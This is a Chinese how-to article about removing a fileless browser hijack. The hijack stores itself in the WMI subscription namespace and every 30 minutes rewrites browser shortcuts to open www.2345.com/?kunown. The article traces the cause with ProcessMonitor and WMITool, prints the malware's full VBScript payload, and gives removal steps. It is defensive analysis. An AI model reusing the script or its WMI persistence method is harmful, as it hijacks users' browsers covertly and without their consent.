IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法[图文]

所属分类: 软件教程 / 浏览下载 阅读数: 1130
收藏 0 赞 0 分享

近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置——均正常!

最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。

IE快捷方式的命令被修改为http://www.2345.com/?kunown

之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。

打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改Win7下opera快速启动图标路径类似如下:

C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:

打开 WMI event viewer 填入 root\subscription

点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",右键选择view instant properties,如下图:

选择view instant properties

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。

受到影响的浏览器有(各色浏览器,差不多齐了):

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

具体代码如下:

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!

删不掉?

到WMITool安装路径(例如:C:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

解决方法来自:Gemini

更多精彩内容其他人还在看

浏览器标识是怎么意思 360手机浏览器怎么设置浏览器ua标识

浏览器标识是怎么意思,浏览器标识是可以使服务器失败客户的操作系统及版本、cpu类型、浏览器版本等相关信息的功能,开启浏览器标识后你可以更加方便的给不同浏览器发送不同的页面
收藏 0 赞 0 分享

火狐浏览器怎么更改的文件默认保存位置?

火狐浏览器怎么更改的文件默认保存位置?火狐浏览器是安装在C盘的,但是想把下载路径放到D盘,怎么砂纸火狐默认的保存路径呢?下面我们一起来看看火狐浏览器更改保存位置的方法
收藏 0 赞 0 分享

2015年Google浏览器页面搜索彩蛋大全

在使用Google浏览器搜索的时候,有没有遇到一些彩蛋呢?谷歌工程师城会玩,在谷歌的页面搜索中设置了很多彩蛋,当你搜索到某个特定关键词的时候,就会出现一些特效,下面我们一起来看看2015年Google的彩蛋汇总
收藏 0 赞 0 分享

360极速浏览器自动翻译功能能取消掉吗?

360极速浏览器自动翻译功能能取消掉吗?360浏览器自带了翻译功能,遇到了英语会自动翻译成英文,虽然很好用,但是浏览器的流畅度就下降了,可以关闭吗?下面分享360极速浏览器关闭自动翻译的教程,需要的朋友可以参考下
收藏 0 赞 0 分享

qq浏览器怎么卸载?不使用控制面板卸载qq浏览器的教程

qq浏览器怎么卸载?之前我们都是用过控制面板或者第三方安全软件来卸载的,电脑里没有360安全卫士等软件,控制面板里又不显示qq浏览器该怎么卸载呢?下面分享另一种卸载方法,需要的朋友可以参考下
收藏 0 赞 0 分享

火狐浏览器怎么切换到IE兼容模式?

火狐浏览器怎么切换到IE兼容模式?有很多网页其他浏览器打不开,但是用ie浏览器就可以打开,怎么设置成ie兼容模式呢?下面我们来看看火狐浏览器切换到IE兼容模式的详细图文教程,需要的朋友可以参考下
收藏 0 赞 0 分享

谷歌Chrome浏览器不能下载百度网盘文件的两种解决办法

Chrome浏览器点击百度云网盘文件无法下载该怎么办?无法正常下载是因为谷歌拦截了,仔细观察Chrome浏览器地址栏的左上角,我们会发现有个锁状的错误提示,把它解决掉就可以了,下面分享两种解决办法,需要的朋友可以参考下
收藏 0 赞 0 分享

电脑版百度地图怎么删除多余的收藏路线?

电脑版百度地图怎么删除多余的收藏路线?经常用百度地图收藏路线,但是不知不觉就收藏了很多,该怎么删除那些不用的路线呢?下面我们来看看百度地图收藏路线的删除方法,需要的朋友可以参考下
收藏 0 赞 0 分享

用户展示微软Edge浏览器概念设计 Aero与Modern风格的结合体

微软Edge浏览器概念设计曝光,该设计基本上继承了目前Edge浏览器的界面Modern风格特点,同样是采用了明暗两种主题配色。但最明显的不同就是这一设计全面采用了Aero透明特效
收藏 0 赞 0 分享

chrome谷歌浏览器怎么随意下载网页中视频?

chrome谷歌浏览器怎么随意下载网页中视频?平时都是用chrome谷歌浏览器下载视频,下面分享使用chrome浏览器下载网页中的视频的一些技巧,需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多